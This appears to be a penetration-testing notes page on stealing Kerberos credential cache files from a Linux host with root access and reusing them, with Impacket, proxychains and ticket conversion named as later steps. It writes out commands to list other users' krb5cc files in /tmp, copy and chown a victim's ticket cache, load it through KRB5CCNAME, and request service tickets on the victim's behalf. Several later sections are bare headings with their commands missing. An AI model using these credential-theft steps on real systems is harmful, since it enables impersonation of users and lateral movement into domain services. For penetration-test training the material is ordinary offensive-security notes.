Kerberos Cache File
Attacking Credential Cache Files
if have root access
can copy cache file
list cache files
ls -al /tmp/krb5cc_*copy the file and change the ownership
sudo cp /tmp/krb5cc_607000500_3aeIA5 /tmp/krb5cc_minenow
sudo chown kali:kali /tmp/krb5cc_minenowTo use this you must set the environment variable and destroy any old tickets
kdestroy
klist
export KRB5CCNAME=/tmp/krb5cc_minenow
klisttickets can now be requested on their behalf
kvno MSSQLSvc/DC01.test.domain:1433klist to view the newly added ticket
Moving the krb5 file to your kali box
Then
Verify
Then test access with impacket psexec
Kerberos with Impacket
in order to perform ticket manipulation, we need to install the kerberos linux client utilities on the kali box
If you screw up the install or need to change something
sudo dpkg-reconfigure krb5-config
We’ll also have to copy the ccache file previously obtained to our local Kali box
Next we’ll have to update the environment variable on our local kali box
We’ll need to update the hosts file to map the hostnames to IP addresses
Also the source IP address will have to be correct so proxychains will need to be used
proxychains4.conf will need to comment out DNS
set up a socks server on the pivot host
now proxychains & impacket can be used to interact with the remote host
Gather a list of SPNs available
get a shell on the remote box
Renew
Convert ccache to Kirbi
Convert ccache to kirbi
inject ticket on compromised host
Last updated
Was this helpful?